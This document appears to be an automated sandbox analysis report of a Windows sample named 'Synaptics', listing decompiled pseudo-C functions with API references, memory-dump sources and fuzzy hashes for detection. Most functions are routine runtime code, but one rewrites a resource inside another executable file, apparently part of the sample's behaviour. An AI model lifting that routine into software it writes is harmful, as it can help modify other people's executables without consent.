							 *_v28 =  *_t165;
							_v28[1] = _t165[1];
							_t211 = _v28;
							_v28[2] = _t165[2];
							_v28[3] = _t165[3];
							_v24 =  &(_v24[3]);
						} else {
							_v36 = _t260 + _v20 * 8 - 0x250;
							 *_v36 = E00405974(_v24[2], _t211);
							_v36[1] = 0;
							 *_v28 = 8;
							_v28[2] =  *_v36;
							_v20 = _v20 + 1;
						}
					}
                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _v16 - 0xc;
                                                                                                                                                                                                                            								if(_v16 == 0xc) {
                                                                                                                                                                                                                            									__eflags =  *( *_v24) - 0x100;
                                                                                                                                                                                                                            									if( *( *_v24) == 0x100) {
                                                                                                                                                                                                                            										_t211 = 8;
                                                                                                                                                                                                                            										E00411330( *_v24, 8,  *_v24, _t256, _t276);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								 *_v28 = _v16 | 0x00004000;
                                                                                                                                                                                                                            								_v28[2] =  *_v24;
                                                                                                                                                                                                                            								goto L23;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_v32 = _t260 + _v20 * 8 - 0x250;
                                                                                                                                                                                                                            								__eflags = _t158;
                                                                                                                                                                                                                            								if(_t158 == 0) {
                                                                                                                                                                                                                            									 *_v32 = E00405974( *_v24, _t211);
                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                            									 *(_v32 + 4) = 0;
                                                                                                                                                                                                                            									 *_v28 = 8;
                                                                                                                                                                                                                            									_v28[2] =  *_v32;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									 *_v32 = E00405974( *( *_v24), _t211);
                                                                                                                                                                                                                            									 *(_v32 + 4) =  *_v24;
                                                                                                                                                                                                                            									 *_v28 = 0x4008;
                                                                                                                                                                                                                            									_v28[2] = _v32;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_v20 = _v20 + 1;
                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                            								_t98 =  &_v24;
                                                                                                                                                                                                                            								 *_t98 =  &(_v24[1]);
                                                                                                                                                                                                                            								__eflags =  *_t98;
                                                                                                                                                                                                                            								goto L24;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							 *_v28 = 0xa;
                                                                                                                                                                                                                            							_v28[2] = 0x80020004;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L24:
                                                                                                                                                                                                                            						_t209 = _t209 + 1;
                                                                                                                                                                                                                            					} while (_t256 != _t209);
                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                            0x0047874d
                                                                                                                                                                                                                            0x00478750
                                                                                                                                                                                                                            0x00478752
                                                                                                                                                                                                                            0x0047875c
                                                                                                                                                                                                                            0x0047875c
                                                                                                                                                                                                                            0x00478761
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00478745
                                                                                                                                                                                                                            0x004784e7
                                                                                                                                                                                                                            0x004784ea
                                                                                                                                                                                                                            0x004784f8
                                                                                                                                                                                                                            0x004784fb
                                                                                                                                                                                                                            0x004784fd
                                                                                                                                                                                                                            0x004784fd
                                                                                                                                                                                                                            0x00478501
                                                                                                                                                                                                                            0x00478510
                                                                                                                                                                                                                            0x00478513
                                                                                                                                                                                                                            0x00478519
                                                                                                                                                                                                                            0x00478533
                                                                                                                                                                                                                            0x00478537
                                                                                                                                                                                                                            0x004785ad
                                                                                                                                                                                                                            0x004785af
                                                                                                                                                                                                                            0x004785f6
                                                                                                                                                                                                                            0x004785fa
                                                                                                                                                                                                                            0x00478675
                                                                                                                                                                                                                            0x0047867f
                                                                                                                                                                                                                            0x00478682
                                                                                                                                                                                                                            0x00478686
                                                                                                                                                                                                                            0x00478688
                                                                                                                                                                                                                            0x0047868c
                                                                                                                                                                                                                            0x0047868e
                                                                                                                                                                                                                            0x0047868e
                                                                                                                                                                                                                            0x0047868e
                                                                                                                                                                                                                            0x0047869a
                                                                                                                                                                                                                            0x0047869a
                                                                                                                                                                                                                            0x0047868c
                                                                                                                                                                                                                            0x004785fc
                                                                                                                                                                                                                            0x004785ff
                                                                                                                                                                                                                            0x00478604
                                                                                                                                                                                                                            0x00478644
                                                                                                                                                                                                                            0x0047864c
                                                                                                                                                                                                                            0x00478654
                                                                                                                                                                                                                            0x0047865a
                                                                                                                                                                                                                            0x0047865d
                                                                                                                                                                                                                            0x00478666
                                                                                                                                                                                                                            0x00478669
                                                                                                                                                                                                                            0x00478606
                                                                                                                                                                                                                            0x00478610
                                                                                                                                                                                                                            0x00478621
                                                                                                                                                                                                                            0x00478628
                                                                                                                                                                                                                            0x0047862e
                                                                                                                                                                                                                            0x0047863c
                                                                                                                                                                                                                            0x0047863f
                                                                                                                                                                                                                            0x0047863f
                                                                                                                                                                                                                            0x00478604
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004785fa
                                                                                                                                                                                                                            0x004785b1
                                                                                                                                                                                                                            0x004785b5
                                                                                                                                                                                                                            0x004785bc
                                                                                                                                                                                                                            0x004785c1
                                                                                                                                                                                                                            0x004785cf
                                                                                                                                                                                                                            0x004785d4
                                                                                                                                                                                                                            0x004785d4
                                                                                                                                                                                                                            0x004785c1
                                                                                                                                                                                                                            0x004785e4
                                                                                                                                                                                                                            0x004785ee
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00478539
                                                                                                                                                                                                                            0x00478543
                                                                                                                                                                                                                            0x00478546
                                                                                                                                                                                                                            0x00478548
                                                                                                                                                                                                                            0x00478587
                                                                                                                                                                                                                            0x0047858c
                                                                                                                                                                                                                            0x0047858e
                                                                                                                                                                                                                            0x00478594
                                                                                                                                                                                                                            0x004785a2
                                                                                                                                                                                                                            0x0047854a
                                                                                                                                                                                                                            0x00478559
                                                                                                                                                                                                                            0x00478563
                                                                                                                                                                                                                            0x00478569
                                                                                                                                                                                                                            0x00478575
                                                                                                                                                                                                                            0x00478575
                                                                                                                                                                                                                            0x004785a5
                                                                                                                                                                                                                            0x0047869d
                                                                                                                                                                                                                            0x0047869d
                                                                                                                                                                                                                            0x0047869d
                                                                                                                                                                                                                            0x0047869d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0047869d
                                                                                                                                                                                                                            0x0047851b
                                                                                                                                                                                                                            0x0047851e
                                                                                                                                                                                                                            0x00478527
                                                                                                                                                                                                                            0x00478527
                                                                                                                                                                                                                            0x004786a1
                                                                                                                                                                                                                            0x004786a1
                                                                                                                                                                                                                            0x004786a2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004784fd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00478782
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                            • String ID: <~G$H
                                                                                                                                                                                                                            • API String ID: 3341692771-3576284788
                                                                                                                                                                                                                            • Opcode ID: abb6cc486b40284b4fe571549fcb5a3b13e9f6fa694418c3db2e4b804864b1a7
                                                                                                                                                                                                                            • Instruction ID: b8f1c08bed6d2714fac9d526e07dd471d665f945914cf58d975e5e29605529f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abb6cc486b40284b4fe571549fcb5a3b13e9f6fa694418c3db2e4b804864b1a7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7B1F8B4A006099FDB14CF99C884AAEB7F1FF49314F20C56AE909AB351D738AD41CF64
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E5CC,00000000,7 ), ref: 004021D3
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E5CC,0040230B), ref: 004022FE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                                                                            • String ID: 7
                                                                                                                                                                                                                            • API String ID: 2227675388-1331172448
                                                                                                                                                                                                                            • Opcode ID: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                                                                                                                                                                                            • Instruction ID: 4af8bea66c2055acf7768281f877aa53f35be4b0bc747d0b7dec25e4a478ddf4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8441E2B1A04200DFD715CFAADE9562977E0FB68328B6542BFD401E77E1E2799C41CB08
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                            			E0042F680(void* __eax, void* __ebx, void* __ecx, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				int _t17;
                                                                                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_t23 = __eax;
                                                                                                                                                                                                                            				_push(_t35);
                                                                                                                                                                                                                            				_push(0x42f6ff);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t35;
                                                                                                                                                                                                                            				KillTimer( *(__eax + 0x34), 1);
                                                                                                                                                                                                                            				_t32 =  *(_t23 + 0x30);
                                                                                                                                                                                                                            				if(_t32 != 0 &&  *((char*)(_t23 + 0x40)) != 0 &&  *((short*)(_t23 + 0x3a)) != 0) {
                                                                                                                                                                                                                            					_t17 = SetTimer( *(_t23 + 0x34), 1, _t32, 0); // executed
                                                                                                                                                                                                                            					if(_t17 == 0) {
                                                                                                                                                                                                                            						_t18 =  *0x49de08; // 0x422f68
                                                                                                                                                                                                                            						E00406A70(_t18,  &_v8);
                                                                                                                                                                                                                            						E0040D144(_v8, 1);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t28);
                                                                                                                                                                                                                            				 *[fs:eax] = _t28;
                                                                                                                                                                                                                            				_push(E0042F706);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,00000000,0042F6FF,?,?,?,00000000,?,0042F719,004982F9,00000000,00000001,?,0049A117,00000000), ref: 0042F69D
                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,?,00000000), ref: 0042F6BF
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Timer$KillLoadString
                                                                                                                                                                                                                            • String ID: h/B
                                                                                                                                                                                                                            • API String ID: 1423459280-860576603
                                                                                                                                                                                                                            • Opcode ID: 1e7f4a3e1a81165d3749bce0843d0aab77b0c367e19ef7a19d8ea95de236c58b
                                                                                                                                                                                                                            • Instruction ID: c638335ebb45f94185b8bc64c2a04c90921daa6f7a9a6c3e75923d264c20285e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e7f4a3e1a81165d3749bce0843d0aab77b0c367e19ef7a19d8ea95de236c58b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C601B571B04210ABDB10EB61DC92F5A37BCDB45708FD1007AFD00AB2D2D7B9AC44C658
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00407A8C(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                                                                                                                                                                                                            				CHAR* _v8;
                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                            				CHAR* _t29;
                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = _t29;
                                                                                                                                                                                                                            				_t32 = __eax;
                                                                                                                                                                                                                            				_t13 = E00402C0C();
                                                                                                                                                                                                                            				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                                                                                                                                                                                            				E00402BFC(_t13);
                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                                                                            • String ID: TPUtilWindow$x,B
                                                                                                                                                                                                                            • API String ID: 716092398-1057714546
                                                                                                                                                                                                                            • Opcode ID: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                                                                                                                                                                                            • Instruction ID: 8ac853332085b9bd21b4b606e16f655482de0c328e5100a7f3fe009a2cef9f92
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDF092B2704158BF9B80DE9DDD85EDB77ECEB4C264B05416AFA0CE3241D674ED108BA4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E0042C5E4(int _a4) {
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed int _t2;
                                                                                                                                                                                                                            				signed int _t3;
                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                            				int _t8;
                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t8 = _a4;
                                                                                                                                                                                                                            				if( *0x49e928 == 0) {
                                                                                                                                                                                                                            					 *0x49e900 = E0042C4FC(0, _t8,  *0x49e900, _t17, _t18);
                                                                                                                                                                                                                            					_t7 =  *0x49e900(_t8); // executed
                                                                                                                                                                                                                            					return _t7;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t3 = _t2 | 0xffffffff;
                                                                                                                                                                                                                            				_t12 = _t8 + 0xffffffb4 - 2;
                                                                                                                                                                                                                            				__eflags = _t12;
                                                                                                                                                                                                                            				if(__eflags < 0) {
                                                                                                                                                                                                                            					_t3 = 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                            						_t8 = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t13 = _t12 - 1;
                                                                                                                                                                                                                            						__eflags = _t13;
                                                                                                                                                                                                                            						if(_t13 == 0) {
                                                                                                                                                                                                                            							_t8 = 1;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							__eflags = _t13 - 0xffffffffffffffff;
                                                                                                                                                                                                                            							if(_t13 - 0xffffffffffffffff < 0) {
                                                                                                                                                                                                                            								_t3 = 1;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				__eflags = _t3 - 0xffffffff;
                                                                                                                                                                                                                            				if(_t3 != 0xffffffff) {
                                                                                                                                                                                                                            					return _t3;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					return GetSystemMetrics(_t8);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C646
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL ref: 0042C60C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                                                                                                                                                                                            • String ID: GetSystemMetrics
                                                                                                                                                                                                                            • API String ID: 54681038-96882338
                                                                                                                                                                                                                            • Opcode ID: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                                                                                                                                                                                            • Instruction ID: e76955a9c08610525c92f9aeab2c1040e91631f36ff756307eb2880b474183d5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EF0B4B07045649ACB709B3DBEC962F7645A7A5374FE0AF33A111472D1C2BCA842529D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 63%
                                                                                                                                                                                                                            			E00477244(intOrPtr __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v17;
                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                            				intOrPtr* _t41;
                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                            				int _t56;
                                                                                                                                                                                                                            				char _t57;
                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                            				intOrPtr* _t80;
                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t82 = _t83;
                                                                                                                                                                                                                            				_t84 = _t83 + 0xffffffe8;
                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				E00404E70(_v12);
                                                                                                                                                                                                                            				E00404E70(_v16);
                                                                                                                                                                                                                            				_push(_t82);
                                                                                                                                                                                                                            				_push(0x47735e);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t84;
                                                                                                                                                                                                                            				_t35 = BeginUpdateResourceA(E00404E80(_v8), 0); // executed
                                                                                                                                                                                                                            				_t62 = _t35;
                                                                                                                                                                                                                            				_v17 = _t62 != 0;
                                                                                                                                                                                                                            				if(_v17 == 0) {
                                                                                                                                                                                                                            					_pop(_t71);
                                                                                                                                                                                                                            					 *[fs:eax] = _t71;
                                                                                                                                                                                                                            					_push(E00477365);
                                                                                                                                                                                                                            					return E004049E4( &_v16, 3);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *[fs:eax] = _t84;
                                                                                                                                                                                                                            					_t41 = E0041DB54(_v12, 1, __edi, 0); // executed
                                                                                                                                                                                                                            					_t80 = _t41;
                                                                                                                                                                                                                            					_v24 =  *((intOrPtr*)( *_t80))( *[fs:eax], 0x47733c, _t82);
                                                                                                                                                                                                                            					_v28 = E0040275C(_v24);
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t80 + 0xc))();
                                                                                                                                                                                                                            					E00403BEC(_t80);
                                                                                                                                                                                                                            					_t54 = UpdateResourceA(_t62, 0xa, E00404E80(_v16), 0, _v28, _v24); // executed
                                                                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                                                                            					_v17 = _t54 + 1;
                                                                                                                                                                                                                            					_t56 = EndUpdateResourceA(_t62, 0); // executed
                                                                                                                                                                                                                            					if(_t56 == 0 || _v17 == 0) {
                                                                                                                                                                                                                            						_t57 = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t57 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v17 = _t57;
                                                                                                                                                                                                                            					_pop(_t76);
                                                                                                                                                                                                                            					 *[fs:eax] = _t76;
                                                                                                                                                                                                                            					_push(E00477343);
                                                                                                                                                                                                                            					return E0040277C(_v28);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • BeginUpdateResourceA.KERNEL32 ref: 00477287
                                                                                                                                                                                                                            • UpdateResourceA.KERNEL32 ref: 004772FD
                                                                                                                                                                                                                            • EndUpdateResourceA.KERNEL32 ref: 0047730E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ResourceUpdate$Begin
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3792609998-0
                                                                                                                                                                                                                            • Opcode ID: fe88bd44683fbc6ad8d87189a687c06e9862b8563ba036f336503991b4723721
                                                                                                                                                                                                                            • Instruction ID: 9213f19192372b4cf94689ef5aed7bd179d22939e907d1359b5696ed986e8478
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe88bd44683fbc6ad8d87189a687c06e9862b8563ba036f336503991b4723721
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42318470E04204AFDB11DBA9D842BAEBBB8EB45754F51807AF904F73D1C6789D00D798
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E0041DB98(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* _a4, signed short _a8) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                            				intOrPtr _t69;
                                                                                                                                                                                                                            				char _t70;
                                                                                                                                                                                                                            				intOrPtr _t73;
                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                            				void* _t89;
                                                                                                                                                                                                                            				intOrPtr _t90;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t70 = __edx;
                                                                                                                                                                                                                            				_t63 = __ecx;
                                                                                                                                                                                                                            				_t88 = _t89;
                                                                                                                                                                                                                            				_t90 = _t89 + 0xffffffdc;
                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                            				_v40 = 0;
                                                                                                                                                                                                                            				_v28 = 0;
                                                                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                                                                            				if(__edx != 0) {
                                                                                                                                                                                                                            					_t90 = _t90 + 0xfffffff0;
                                                                                                                                                                                                                            					_t29 = E00403F10(_t29, _t88);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t86 = _t63;
                                                                                                                                                                                                                            				_v5 = _t70;
                                                                                                                                                                                                                            				_t62 = _t29;
                                                                                                                                                                                                                            				_t84 = _a8;
